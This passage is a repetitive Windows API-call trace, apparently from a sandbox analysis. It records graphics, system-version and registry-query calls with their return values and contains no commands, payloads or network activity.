returned 0x1100987 [0017.494] DeleteObject (ho=0x1100987) returned 1 [0017.494] DeleteObject (ho=0xef040713) returned 1 [0017.494] DeleteObject (ho=0xe504027d) returned 1 [0017.494] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.494] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.494] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.494] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.494] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.494] BeginPath (hdc=0x0) returned 0 [0017.494] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.494] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.495] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.495] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.495] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.495] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.495] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.495] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.495] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf0040713 [0017.495] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe604027d [0017.495] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040988 [0017.495] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040989 [0017.495] CombineRgn (hrgnDst=0x1040988, hrgnSrc1=0xf0040713, hrgnSrc2=0xe604027d, iMode=1) returned 1 [0017.495] CombineRgn (hrgnDst=0x1040989, hrgnSrc1=0xf0040713, hrgnSrc2=0xe604027d, iMode=4) returned 2 [0017.495] CreateSolidBrush (color=0xff) returned 0x2100987 [0017.495] CreateSolidBrush (color=0xff0000) returned 0x110098a [0017.495] DeleteObject (ho=0x110098a) returned 1 [0017.495] DeleteObject (ho=0xe604027d) returned 1 [0017.495] DeleteObject (ho=0xf0040713) returned 1 [0017.495] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.495] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.495] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.495] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.495] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.495] BeginPath (hdc=0x0) returned 0 [0017.495] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.495] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.495] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.495] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.495] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.495] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.495] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.496] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.496] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe704027d [0017.496] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf1040713 [0017.496] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104098b [0017.496] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104098c [0017.496] CombineRgn (hrgnDst=0x104098b, hrgnSrc1=0xe704027d, hrgnSrc2=0xf1040713, iMode=1) returned 1 [0017.496] CombineRgn (hrgnDst=0x104098c, hrgnSrc1=0xe704027d, hrgnSrc2=0xf1040713, iMode=4) returned 2 [0017.496] CreateSolidBrush (color=0xff) returned 0x210098a [0017.496] CreateSolidBrush (color=0xff0000) returned 0x110098d [0017.496] DeleteObject (ho=0x110098d) returned 1 [0017.496] DeleteObject (ho=0xf1040713) returned 1 [0017.496] DeleteObject (ho=0xe704027d) returned 1 [0017.496] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.496] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.496] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.496] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.496] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.496] BeginPath (hdc=0x0) returned 0 [0017.496] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.496] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.496] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.496] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.496] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.496] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.496] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.496] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.497] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf2040713 [0017.497] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe804027d [0017.497] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104098e [0017.497] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104098f [0017.497] CombineRgn (hrgnDst=0x104098e, hrgnSrc1=0xf2040713, hrgnSrc2=0xe804027d, iMode=1) returned 1 [0017.497] CombineRgn (hrgnDst=0x104098f, hrgnSrc1=0xf2040713, hrgnSrc2=0xe804027d, iMode=4) returned 2 [0017.497] CreateSolidBrush (color=0xff) returned 0x210098d [0017.497] CreateSolidBrush (color=0xff0000) returned 0x1100990 [0017.497] DeleteObject (ho=0x1100990) returned 1 [0017.497] DeleteObject (ho=0xe804027d) returned 1 [0017.497] DeleteObject (ho=0xf2040713) returned 1 [0017.497] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.497] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.497] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.497] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.497] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.497] BeginPath (hdc=0x0) returned 0 [0017.497] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.497] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.497] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.497] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.497] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.497] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.497] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.497] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.497] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe904027d [0017.497] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf3040713 [0017.497] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040991 [0017.497] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040992 [0017.497] CombineRgn (hrgnDst=0x1040991, hrgnSrc1=0xe904027d, hrgnSrc2=0xf3040713, iMode=1) returned 1 [0017.497] CombineRgn (hrgnDst=0x1040992, hrgnSrc1=0xe904027d, hrgnSrc2=0xf3040713, iMode=4) returned 2 [0017.498] CreateSolidBrush (color=0xff) returned 0x2100990 [0017.498] CreateSolidBrush (color=0xff0000) returned 0x1100993 [0017.498] DeleteObject (ho=0x1100993) returned 1 [0017.498] DeleteObject (ho=0xf3040713) returned 1 [0017.498] DeleteObject (ho=0xe904027d) returned 1 [0017.498] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.498] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.498] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.498] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.498] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.498] BeginPath (hdc=0x0) returned 0 [0017.498] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.498] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.498] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.498] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.498] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.498] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.498] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.498] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.498] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf4040713 [0017.498] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xea04027d [0017.498] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040994 [0017.498] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040995 [0017.498] CombineRgn (hrgnDst=0x1040994, hrgnSrc1=0xf4040713, hrgnSrc2=0xea04027d, iMode=1) returned 1 [0017.498] CombineRgn (hrgnDst=0x1040995, hrgnSrc1=0xf4040713, hrgnSrc2=0xea04027d, iMode=4) returned 2 [0017.498] CreateSolidBrush (color=0xff) returned 0x2100993 [0017.498] CreateSolidBrush (color=0xff0000) returned 0x1100996 [0017.498] DeleteObject (ho=0x1100996) returned 1 [0017.498] DeleteObject (ho=0xea04027d) returned 1 [0017.499] DeleteObject (ho=0xf4040713) returned 1 [0017.499] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.499] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.499] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.499] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.499] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.499] BeginPath (hdc=0x0) returned 0 [0017.499] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.499] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.499] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.499] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.499] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.499] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.499] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.499] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.499] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xeb04027d [0017.499] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf5040713 [0017.499] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040997 [0017.499] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040998 [0017.499] CombineRgn (hrgnDst=0x1040997, hrgnSrc1=0xeb04027d, hrgnSrc2=0xf5040713, iMode=1) returned 1 [0017.499] CombineRgn (hrgnDst=0x1040998, hrgnSrc1=0xeb04027d, hrgnSrc2=0xf5040713, iMode=4) returned 2 [0017.499] CreateSolidBrush (color=0xff) returned 0x2100996 [0017.499] CreateSolidBrush (color=0xff0000) returned 0x1100999 [0017.499] DeleteObject (ho=0x1100999) returned 1 [0017.499] DeleteObject (ho=0xf5040713) returned 1 [0017.499] DeleteObject (ho=0xeb04027d) returned 1 [0017.500] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.500] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.500] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.500] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.500] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.500] BeginPath (hdc=0x0) returned 0 [0017.500] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.500] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.500] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.500] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.500] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.500] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.500] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.500] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.500] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf6040713 [0017.500] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xec04027d [0017.500] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104099a [0017.500] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104099b [0017.500] CombineRgn (hrgnDst=0x104099a, hrgnSrc1=0xf6040713, hrgnSrc2=0xec04027d, iMode=1) returned 1 [0017.500] CombineRgn (hrgnDst=0x104099b, hrgnSrc1=0xf6040713, hrgnSrc2=0xec04027d, iMode=4) returned 2 [0017.500] CreateSolidBrush (color=0xff) returned 0x2100999 [0017.500] CreateSolidBrush (color=0xff0000) returned 0x110099c [0017.500] DeleteObject (ho=0x110099c) returned 1 [0017.500] DeleteObject (ho=0xec04027d) returned 1 [0017.500] DeleteObject (ho=0xf6040713) returned 1 [0017.500] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.500] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.500] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.501] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.501] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.501] BeginPath (hdc=0x0) returned 0 [0017.501] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.501] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.501] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.501] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.501] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.501] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.501] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.501] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.501] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xed04027d [0017.501] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf7040713 [0017.501] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104099d [0017.501] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104099e [0017.501] CombineRgn (hrgnDst=0x104099d, hrgnSrc1=0xed04027d, hrgnSrc2=0xf7040713, iMode=1) returned 1 [0017.501] CombineRgn (hrgnDst=0x104099e, hrgnSrc1=0xed04027d, hrgnSrc2=0xf7040713, iMode=4) returned 2 [0017.501] CreateSolidBrush (color=0xff) returned 0x210099c [0017.501] CreateSolidBrush (color=0xff0000) returned 0x110099f [0017.501] DeleteObject (ho=0x110099f) returned 1 [0017.501] DeleteObject (ho=0xf7040713) returned 1 [0017.501] DeleteObject (ho=0xed04027d) returned 1 [0017.501] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.501] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.501] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.501] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.501] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.501] BeginPath (hdc=0x0) returned 0 [0017.501] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.501] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.501] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.501] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.501] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.502] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.502] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.502] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.502] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf8040713 [0017.502] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xee04027d [0017.502] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409a0 [0017.502] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409a1 [0017.502] CombineRgn (hrgnDst=0x10409a0, hrgnSrc1=0xf8040713, hrgnSrc2=0xee04027d, iMode=1) returned 1 [0017.502] CombineRgn (hrgnDst=0x10409a1, hrgnSrc1=0xf8040713, hrgnSrc2=0xee04027d, iMode=4) returned 2 [0017.502] CreateSolidBrush (color=0xff) returned 0x210099f [0017.502] CreateSolidBrush (color=0xff0000) returned 0x11009a2 [0017.502] DeleteObject (ho=0x11009a2) returned 1 [0017.502] DeleteObject (ho=0xee04027d) returned 1 [0017.502] DeleteObject (ho=0xf8040713) returned 1 [0017.502] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.502] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.502] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.502] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.502] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.502] BeginPath 